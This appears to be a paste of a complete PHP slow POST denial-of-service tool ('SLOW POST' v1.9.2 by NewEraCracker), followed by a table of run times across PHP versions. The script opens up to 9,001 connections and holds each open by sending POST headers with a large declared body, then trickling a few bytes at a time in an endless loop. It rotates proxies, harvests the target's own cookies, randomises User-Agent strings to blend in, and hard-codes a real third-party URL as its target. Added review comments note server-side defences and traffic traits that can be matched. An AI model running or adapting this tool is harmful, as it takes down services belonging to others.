@ 2013-05-13T06:17:42Z <?php
// Process-level settings: remove PHP's execution time limit and keep running
// even if the client that started the script disconnects.
set_time_limit(0);
ignore_user_abort(true);
// NOTE(review): argv[1] is overwritten unconditionally with a fixed URL on a
// third-party host, so a URL passed on the command line is ignored and the
// interactive prompts guarded by empty($url) further down are never reached.
// This looks like an artefact of the paste rather than part of the tool;
// confirm against other copies of the sample.
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
//-------------------------
// CONFIG
//-------------------------
// Number of cookie strings NewEraCookies collects up front (one GET request each).
$CONFIG['max_cookies'] = 20;
// Size of the connection table in the main loop: the inner loop fills slots
// 0..max_sockets-1, one slot per pass.
$CONFIG['max_sockets'] = 9001;
// Passed as the microseconds argument of stream_set_timeout() in
// openCustomSocket(), despite the _ms suffix.
$CONFIG['timeout_ms'] = 500;
// Microseconds slept by slowPostContinue() before each body fragment.
$CONFIG['usleep_time'] = 10;
//-------------------------
// INIT
//-------------------------
// Version string printed under the startup banner.
if(!defined('EXPLOIT_VERSION'))
define('EXPLOIT_VERSION', 'v1.9.2');
// STDIN is only predefined by the CLI SAPI; define it when it is missing.
if(!defined('STDIN'))
define('STDIN', fopen('php://stdin', 'r'));
// Proxy pool shared through `global`: filled by proxyLoadFile(), read by proxyGetRandom().
$global_proxy_array = array();
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/**
 * Reads one line from the STDIN stream and returns it with surrounding
 * whitespace removed.
 *
 * @return string|false The trimmed line, or false when the STDIN constant holds a falsy handle.
 */
function readSTDIN() {
    $stdinHandle = STDIN;
    if ($stdinHandle) {
        return trim(fgets($stdinHandle));
    }
    return false;
}
/**
 * Reads a proxy-list file and appends every "host:port" line to the global
 * $global_proxy_array as array('host' => string, 'port' => int).
 *
 * Lines without a colon are skipped. Host and port are only trimmed and cast,
 * not validated: a non-numeric port becomes 0 and an empty host is accepted.
 * When the file name is empty or the file cannot be read (or its content is
 * falsy), a message is printed and the script exits with status 1.
 *
 * @param string $filename Path to the list; backslashes are converted to forward slashes.
 * @return void
 */
function proxyLoadFile($filename) {
    global $global_proxy_array;

    // Normalise Windows path separators before reading.
    $filename = str_replace('\\', '/', $filename);
    $raw = @file_get_contents($filename);
    if (!($filename && $raw)) {
        echo $filename.' is not a valid proxy-list file!';
        exit(1);
    }

    // Treat CRLF and bare CR as LF, then walk the file line by line.
    $lines = explode("\n", str_replace(array("\r\n", "\r"), "\n", $raw));
    foreach ($lines as $line) {
        $parts = explode(':', $line);
        if (!isset($parts[0], $parts[1])) {
            continue;
        }
        $global_proxy_array[] = array(
            'host' => trim($parts[0]),
            'port' => (int)(trim($parts[1])),
        );
    }
}
/**
 * Picks one entry at random from the global $global_proxy_array.
 *
 * Uses mt_rand(), and redraws until the chosen index holds a truthy entry.
 *
 * @return array|false The chosen array('host' => ..., 'port' => ...) entry, or false when the pool is empty.
 */
function proxyGetRandom() {
    global $global_proxy_array;

    $poolSize = count($global_proxy_array);
    if (!$poolSize) {
        return false;
    }

    do {
        $pick = mt_rand(0, $poolSize - 1);
        $entry = (isset($global_proxy_array[$pick]) ? $global_proxy_array[$pick] : null);
    } while (!$entry);

    return $entry;
}
/**
 * Builds a User-Agent string from a small fixed pool: one of six Windows NT
 * versions combined with either one of four Internet Explorer profiles or one
 * of five Firefox versions.
 *
 * The OS version and the browser are drawn independently, so the function can
 * emit pairings such as "MSIE 10.0" with "Windows NT 5.0". The whole pool is
 * 54 strings, which makes the generated values enumerable when matching this
 * traffic in logs.
 *
 * @return string The User-Agent header value.
 */
function randomUserAgent() {
    // Windows NT version token, drawn first.
    $ntVersions = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
    $nt = $ntVersions[mt_rand(0, count($ntVersions) - 1)];

    // Coin flip: 0 selects Firefox, 1 selects Internet Explorer.
    $useFirefox = !mt_rand(0, 1);
    if ($useFirefox) {
        $firefox = array('17.0', '18.0', '19.0', '20.0', '21.0');
        $rv = $firefox[mt_rand(0, count($firefox) - 1)];
        return "Mozilla/5.0 (Windows NT {$nt}; rv:{$rv}) Gecko/20100101 Firefox/{$rv}";
    }

    // Each row: Mozilla token, MSIE version, Trident version.
    $explorer = array(
        array('4.0', '7.0', '4.0'),
        array('4.0', '8.0', '4.0'),
        array('5.0', '9.0', '5.0'),
        array('5.0', '10.0', '6.0'),
    );
    list($mozilla, $msie, $trident) = $explorer[mt_rand(0, count($explorer) - 1)];
    return "Mozilla/{$mozilla} (compatible; MSIE {$msie}; Windows NT {$nt}; Trident/{$trident})";
}
/**
 * Opens a non-blocking client socket to the proxy when one is given,
 * otherwise directly to the target.
 *
 * Each call is a new TCP connection (wrapped in TLS when the chosen endpoint's
 * ->ssl is true), so from the receiving side the script shows up as a stream of
 * new connections that server-side per-source connection-count and
 * connection-rate limits apply to.
 *
 * @param object      $newEraUrl   Target descriptor; ->ssl, ->name and ->port are read when no proxy is used.
 * @param object|null $newEraProxy Proxy descriptor with the same three properties, or null for a direct connection.
 * @return resource|false The socket, or false when fsockopen() fails (its warning is suppressed).
 */
function openCustomSocket($newEraUrl, $newEraProxy = null) {
global $CONFIG;
// fsockopen() is called without an explicit timeout, so this ini value bounds the connect attempt.
@ini_set('default_socket_timeout', 1);
// Loose comparison with null: no proxy means connect straight to the target.
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port);
if(!$fp)
return false;
// Non-blocking mode: later fwrite() calls return without waiting on the peer.
stream_set_blocking($fp, 0);
// NOTE(review): the third argument of stream_set_timeout() is microseconds,
// while the config key is named timeout_ms.
stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
return $fp;
}
/**
 * Sends the request line and headers of a POST and returns the body length it
 * declared; no body bytes are written here.
 *
 * The declared Content-Length is a random value in 1337..133700. The body is
 * fed afterwards a few bytes at a time by slowPostContinue(), which holds the
 * server-side request open until the declared length is reached. Server-side
 * controls that bound this are request-body read timeouts and minimum data
 * rates (for example Apache mod_reqtimeout's RequestReadTimeout or nginx's
 * client_body_timeout) together with per-source connection limits.
 *
 * Traits visible on the wire that can be matched in logs or WAF rules:
 *  - the Accept header value itself begins with "Accept: " (the name is repeated);
 *  - a Keep-Alive header holding only a bare number in 60..120;
 *  - a Referer, present on about half of the requests, equal to the request URL itself;
 *  - a form-urlencoded Content-Type with a large Content-Length and almost no body.
 *
 * @param resource|false $sock        Socket from openCustomSocket().
 * @param object         $newEraUrl   Target descriptor; ->full_url, ->path and ->name are read.
 * @param object|null    $newEraProxy When truthy, the request line carries the absolute URL instead of the path.
 * @param string|false   $cookie      Cookie header value; the header is omitted when this is falsy.
 * @return int|false The declared Content-Length, or false when $sock is falsy.
 */
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) {
// Check the socket
if(!$sock)
return false;
// Generate a random Content-Length
$length = mt_rand(1337, 133700);
// Build the header block; the order of the lines below is the order on the wire
$header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= 'Content-Length: '.$length."\r\n";
$header .= "\r\n";
// The result of fwrite() is not checked, so the length is returned even if
// nothing was written to the socket.
@fwrite($sock, $header);
return $length;
}
/**
 * Writes the next small fragment of a pending POST body to the socket.
 *
 * Generates $bytes random printable ASCII characters (codes 33..126) and
 * writes them URL-encoded. Encoding turns each escaped character into three
 * bytes, so the number of bytes on the wire can be larger than $bytes, while
 * the main loop subtracts only $bytes from its remaining-length counter.
 *
 * From the server's side this is a request body arriving a handful of bytes
 * at a time; a minimum body data rate or a body read timeout is the control
 * that ends such a request.
 *
 * @param resource|false $sock  Socket that already received the headers from slowPostStart().
 * @param int            $bytes Number of characters to generate; non-integer values fall back to 5.
 * @return bool True after the write was attempted (its result is not checked), false when $sock is falsy.
 */
function slowPostContinue($sock, $bytes = 5) {
global $CONFIG;
// Check the socket
if(!$sock)
return false;
// Fall back to the default when $bytes is not a whole number
if(intval($bytes) != $bytes)
$bytes = 5;
// Pause for $CONFIG['usleep_time'] microseconds before writing
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Build the fragment from random printable ASCII and send it URL-encoded
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(33, 126));
@fwrite($sock, urlencode($tmp));
return true;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/**
 * Collects a pool of Cookie header values by sending ordinary GET requests to
 * the target before any POST is made, and hands them out by index.
 *
 * Because the cookies are issued by the target itself, the later POST requests
 * carry valid-looking session cookies; the presence of a cookie therefore does
 * not separate this traffic from a browser's.
 */
class NewEraCookies {
// Number of cookie strings requested from the target.
private $max_cookies;
// Collected Cookie header values, indexed 0..max_cookies-1 (false or '' on failure).
private $cookies = array();
/**
 * Builds the pool immediately; see update_object() for the parameters.
 */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/**
 * Discards the current pool and fetches $max_cookies new cookie strings.
 *
 * @param object      $newEraUrl   Target descriptor passed to cookieGrab().
 * @param object|null $newEraProxy Proxy descriptor; updated in place when $proxyFile is truthy.
 * @param int         $max_cookies Number of GET requests to make.
 * @param mixed       $proxyFile   Truthy when a proxy list is in use; a random proxy is then chosen per request.
 * @param bool        $output      When true, prints a heading and one dot per request.
 * @return void
 */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
// An empty proxy pool ends the script here.
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
// Mutates the caller's proxy object rather than creating a new one.
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/**
 * Returns the stored cookie string for an index, or '' when the slot is unset.
 *
 * NOTE(review): 'random' is tested with a loose ==, so on PHP versions before
 * 8.0 the integer index 0 also compares equal and yields a random entry.
 *
 * @param int|string $idx Slot number, or the string 'random'.
 * @return string|false
 */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/**
 * Extracts Set-Cookie lines from a list of response header lines.
 *
 * For each Set-Cookie line the first ';'-separated part becomes
 * ['value' => ['key' => name, 'value' => value]]; later parts are kept only
 * when their lower-cased name is domain, expires, path, secure or comment.
 * Parts are split on every '=', so only the text between the first and second
 * '=' is kept as the value.
 *
 * @param array $header Response header lines.
 * @return array One entry per Set-Cookie line.
 */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
// False until the name=value pair at the start of the line has been stored.
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
// Attribute names are matched case-insensitively.
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
// "secure" carries no value in the header; store the string 'true' for it.
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/**
 * Joins parsed cookies into a Cookie request-header value ("a=1; b=2").
 *
 * @param mixed $data Output of cookieParse().
 * @return string|false The header value, or false when $data is not an array or holds no cookies.
 */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/**
 * Sends one GET request to the target through PHP's http stream wrapper and
 * returns the cookies from the response as a Cookie header value.
 *
 * The request headers match the ones slowPostStart() sends, including the
 * Accept value that itself begins with "Accept: ".
 *
 * @param object      $newEraUrl   Target descriptor; ->name and ->full_url are read.
 * @param object|null $newEraProxy Proxy descriptor; ->full_url is used as the wrapper's proxy when truthy.
 * @return string|false '' when the request could not be opened, false when the response set no cookies.
 */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
// Build connection header
$header = 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
// Check proxy url
if($newEraProxy) {
// Enable proxy: the wrapper then sends the absolute URL in the request line
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
} else {
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
// Build stream context: 3 second timeout, redirects are not followed, and
// ignore_errors keeps the headers readable when the status is an HTTP error
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'timeout' => (3),
'header' => $header,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
// TLS peer certificate verification is switched off for this fetch
'ssl' => array(
'verify_peer' => false
)
));
// Open the URL; warnings are suppressed and a failure leaves $cookie as ''
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
if($handle) {
// For the http wrapper, wrapper_data holds the response header lines
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// The response body is never read; only the headers were needed
@fclose($handle);
}
return $cookie;
}
}
/**
 * Splits an http(s) URL into scheme, host, port and path by plain string
 * splitting (no parse_url()), and exposes the parts as read-only magic
 * properties: full_url, protocol, ssl, name, port, path.
 */
class NewEraUrl {
    private $host_full_url;
    private $host_protocol;
    private $host_ssl;
    private $host_name;
    private $host_port;
    private $host_path;

    /**
     * @param string $host_full_url URL to split; see update_object().
     */
    public function __construct($host_full_url) {
        $this->update_object($host_full_url);
    }

    /**
     * Re-populates every field from a URL.
     *
     * The URL is cut on '/' into at most four pieces, so piece 2 is the
     * "host[:port]" part and piece 3 is everything after the first path slash.
     * An explicit port is kept as a string; the default (443 or 80) is an int.
     *
     * @param string $host_full_url URL such as "http://host:port/path".
     * @return void
     */
    public function update_object($host_full_url) {
        $usesTls = (strpos($host_full_url, 'https') === 0);

        $this->host_full_url = $host_full_url;
        $this->host_ssl = $usesTls;
        $this->host_protocol = $usesTls ? 'https' : 'http';

        $segments = explode('/', $host_full_url, 4);
        $authority = explode(':', $segments[2], 2);

        $this->host_name = $authority[0];
        if (isset($authority[1])) {
            $this->host_port = $authority[1];
        } else {
            $this->host_port = $usesTls ? 443 : 80;
        }
        $this->host_path = '/'.(isset($segments[3]) ? $segments[3] : '');
    }

    /**
     * Maps $obj->foo to the private field host_foo.
     *
     * @param string $var Field name without the "host_" prefix.
     * @return mixed The field value, or null when the field is unset or null.
     */
    public function __get($var) {
        $field = 'host_'.$var;
        return isset($this->{$field}) ? $this->{$field} : null;
    }

    /**
     * Checks only that the string starts with "https://" or "http://".
     *
     * @param string $host_full_url Candidate URL.
     * @return true|null True for a matching prefix, null otherwise.
     */
    public static function isValid($host_full_url) {
        foreach (array('https://', 'http://') as $prefix) {
            if (strpos($host_full_url, $prefix) === 0) {
                return true;
            }
        }
        return null;
    }
}
/**
 * Holds a proxy endpoint given as "[scheme://]host[:port]" and exposes it as
 * read-only magic properties: full_url, protocol, ssl, name, port.
 */
class NewEraProxy {
    private $proxy_full_url;
    private $proxy_protocol;
    private $proxy_ssl;
    private $proxy_name;
    private $proxy_port;

    /**
     * @param string $proxy_full_url Endpoint string; see update_object().
     */
    public function __construct($proxy_full_url) {
        $this->update_object($proxy_full_url);
    }

    /**
     * Re-populates every field from an endpoint string.
     *
     * A string starting with "ssl" selects the ssl protocol, anything else is
     * treated as tcp. The port defaults to 443 for ssl and 80 for tcp, and is
     * always stored as an int.
     *
     * @param string $proxy_full_url Endpoint such as "tcp://host:port".
     * @return void
     */
    public function update_object($proxy_full_url) {
        $overTls = (strpos($proxy_full_url, 'ssl') === 0);

        $this->proxy_full_url = $proxy_full_url;
        $this->proxy_ssl = $overTls;
        $this->proxy_protocol = $overTls ? 'ssl' : 'tcp';

        // Drop the "scheme://" prefix when there is one.
        $schemeEnd = strpos($proxy_full_url, '://');
        $hostPort = ($schemeEnd !== false) ? substr($proxy_full_url, $schemeEnd + 3) : $proxy_full_url;
        $pieces = explode(':', $hostPort);

        $this->proxy_name = $pieces[0];
        if (isset($pieces[1])) {
            $port = $pieces[1];
        } else {
            $port = $overTls ? '443' : '80';
        }
        $this->proxy_port = (int)$port;
    }

    /**
     * Maps $obj->foo to the private field proxy_foo.
     *
     * @param string $var Field name without the "proxy_" prefix.
     * @return mixed The field value, or null when no such field exists.
     */
    public function __get($var) {
        $field = 'proxy_'.$var;
        return property_exists($this, $field) ? $this->{$field} : null;
    }
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
// Startup banner ("SLOW POST" in ASCII art) followed by the version string and
// author tag. Both are written to standard output only.
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Target URL: taken from argv[1] when it starts with http:// or https://.
// In this copy of the file argv[1] is overwritten near the top with a fixed
// URL, so $url is always set here and both prompt loops below are skipped.
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Proxy selection from argv[2]: either "host:port" or the path of a readable list file
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2])) {
// NOTE(review): this assignment replaces the whole $proxy array, so the
// defaults set above (including 'file') are gone unless one of the branches
// below sets them again.
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
// No host:port found: treat argv[2] as a proxy-list file when it is readable
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Interactive proxy prompt, reached only when no URL came from argv
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) {
$proxy['use'] = null;
while(!$proxy['use']) {
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
// Only the first letter of the answer is checked: n, y or f
if(strpos(strtolower($proxy['use']), 'n') === 0) {
break;
} elseif(strpos(strtolower($proxy['use']), 'y') === 0) {
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = (int)(readSTDIN());
} elseif(strpos(strtolower($proxy['use']), 'f') === 0) {
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
} else {
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Interactive target prompt; repeats until the input passes NewEraUrl::isValid()
while(!$url) {
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy support: a single host:port, a random entry from the list file, or none
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others: parse the target and collect the cookie pool.
// The constructor below already sends $CONFIG['max_cookies'] GET requests to the target.
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);
// Main loop. $fp is the connection table: slot index => array('sock' => socket,
// 'length' => body characters still to be sent for that connection).
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$fp = array();
// The outer loop has no exit condition; the script runs until it is killed.
// Seen from the server, the result is a large number of concurrent POST
// requests whose bodies each advance by at most 5 generated characters per
// pass, which is the pattern request-body timeouts and minimum-rate limits
// are designed to cut off.
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file? Then switch to another random proxy for this connection
if($proxy['file']) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket for slot $i
$tmp = array();
if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) {
// Progress bar: one dot per opened connection
echo '.';
// Send the POST headers; the return value is the declared Content-Length
if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
if(isset($fp[$i], $fp[$i]['sock'])) {
// Close connection in the global socket array if it is being used
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
} else {
// Headers could not be started; drop the socket
@fclose($tmp['sock']);
}
}
unset($tmp);
// Service every tracked connection once per inner-loop pass
foreach($fp as $k => $v) {
if($fp[$k]['length'] > 0) {
// Continue old slowPosts: send up to 5 more characters of the body
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['sock'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed slowPosts (counter reached zero)
@fclose($fp[$k]['sock']);
unset($fp[$k]);
}
}
}
}
?>
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 8.3.6 1.209 0.792 18.80 8.3.5 1.123 0.880 22.01 8.3.4 1.163 0.840 19.29 8.3.3 1.099 0.902 19.76 8.3.2 1.256 0.746 20.76 8.3.1 1.222 0.779 23.89 8.3.0 1.205 0.795 21.26 8.2.18 1.179 0.822 17.00 8.2.17 1.211 0.789 22.96 8.2.16 1.221 0.784 22.38 8.2.15 1.175 0.826 24.18 8.2.14 1.136 0.866 24.66 8.2.13 1.238 0.778 26.16 8.2.12 1.183 0.820 20.98 8.2.11 1.196 0.806 22.30 8.2.10 0.978 1.022 18.34 8.2.9 0.669 1.332 19.72 8.2.8 0.629 1.372 18.00 8.2.7 0.696 1.306 18.13 8.2.6 0.637 1.366 18.05 8.2.5 0.702 1.297 18.25 8.2.4 0.663 1.340 20.32 8.2.3 0.672 1.328 18.69 8.2.2 0.686 1.315 18.24 8.2.1 0.608 1.389 18.62 8.2.0 0.620 1.383 18.19 8.1.28 1.165 0.836 25.92 8.1.27 1.169 0.832 24.23 8.1.26 1.232 0.769 26.35 8.1.25 1.159 0.842 28.09 8.1.24 1.173 0.830 24.14 8.1.23 1.035 0.972 19.29 8.1.22 0.579 1.421 18.05 8.1.21 0.669 1.332 18.77 8.1.20 0.649 1.334 17.85 8.1.19 0.683 1.319 17.75 8.1.18 0.636 1.365 18.10 8.1.17 0.636 1.364 18.84 8.1.16 0.752 1.248 22.50 8.1.15 0.643 1.359 19.04 8.1.14 0.636 1.365 17.82 8.1.13 0.787 1.218 18.45 8.1.12 0.613 1.390 17.99 8.1.11 0.696 1.305 17.92 8.1.10 0.659 1.342 17.92 8.1.9 0.669 1.332 17.90 8.1.8 0.579 1.421 17.88 8.1.7 0.746 1.256 17.72 8.1.6 0.641 1.366 18.14 8.1.5 0.670 1.333 18.03 8.1.4 0.627 1.377 17.94 8.1.3 0.619 1.381 18.00 8.1.2 0.600 1.402 18.02 8.1.1 0.623 1.378 17.97 8.1.0 0.533 1.468 18.01 8.0.30 0.680 1.324 18.77 8.0.29 0.679 1.321 17.25 8.0.28 0.649 1.352 18.84 8.0.27 0.677 1.327 17.70 8.0.26 0.601 1.406 17.57 8.0.25 0.680 1.323 17.38 8.0.24 0.560 1.443 17.42 8.0.23 0.639 1.362 17.38 8.0.22 0.613 1.388 17.29 8.0.21 0.620 1.383 17.32 8.0.20 0.643 1.360 17.47 8.0.19 0.543 1.458 17.33 8.0.18 0.663 1.339 17.32 8.0.17 0.636 1.366 17.31 8.0.16 0.581 1.425 17.35 8.0.15 0.572 1.428 17.46 8.0.14 0.673 1.330 17.26 8.0.13 0.676 1.325 14.05 8.0.12 1.496 0.442 17.35 8.0.11 1.447 0.494 17.26 8.0.10 1.511 0.450 17.39 8.0.9 1.518 0.419 17.39 8.0.8 1.349 0.593 17.39 8.0.7 1.473 0.464 17.25 
8.0.6 1.561 0.394 17.30 8.0.5 1.491 0.440 17.24 8.0.3 1.509 0.450 17.38 8.0.2 1.461 0.392 17.44 8.0.1 1.522 0.412 17.28 8.0.0 1.468 0.491 17.26 7.4.33 0.646 1.355 15.33 7.4.32 0.683 1.319 16.82 7.4.30 0.573 1.430 16.74 7.4.29 0.589 1.412 16.87 7.4.28 0.583 1.419 16.67 7.4.27 0.636 1.365 16.74 7.4.26 0.591 1.405 16.81 7.4.25 1.425 0.508 16.95 7.4.24 1.454 0.481 16.96 7.4.23 1.383 0.564 17.01 7.4.22 1.345 0.598 16.88 7.4.21 1.327 0.615 16.85 7.4.20 1.532 0.419 16.95 7.4.16 1.486 0.468 16.95 7.4.15 1.420 0.525 17.40 7.4.14 1.448 0.508 17.86 7.4.13 1.449 0.509 16.94 7.4.12 1.434 0.534 16.96 7.4.11 1.517 0.511 16.93 7.4.10 1.577 0.496 16.86 7.4.9 1.518 0.553 16.88 7.4.8 1.422 0.514 19.39 7.4.7 1.312 0.621 16.87 7.4.6 1.309 0.638 16.92 7.4.5 1.463 0.454 16.81 7.4.4 1.482 0.538 16.85 7.4.3 1.384 0.613 16.92 7.3.33 0.562 1.437 13.81 7.3.32 0.565 1.433 13.71 7.3.31 1.495 0.463 16.70 7.3.30 1.442 0.497 16.86 7.3.29 1.356 0.579 16.75 7.3.28 1.394 0.536 16.82 7.3.27 1.497 0.457 17.40 7.3.26 1.497 0.469 16.81 7.3.25 1.465 0.490 16.79 7.3.24 1.495 0.457 16.93 7.3.23 1.585 0.453 16.82 7.3.21 1.546 0.499 16.91 7.3.20 1.404 0.575 19.39 7.3.19 1.134 0.490 16.91 7.3.18 1.443 0.590 16.96 7.3.17 1.432 0.579 16.87 7.3.16 1.362 0.659 16.80 7.2.33 1.564 0.477 17.22 7.2.32 1.119 0.395 16.91 7.2.31 1.433 0.569 16.95 7.2.30 1.380 0.605 16.84 7.2.29 1.446 0.534 17.04 7.2.10 1.142 0.318 15.07 7.1.22 1.104 0.447 14.18 5.6.38 1.061 0.364 14.58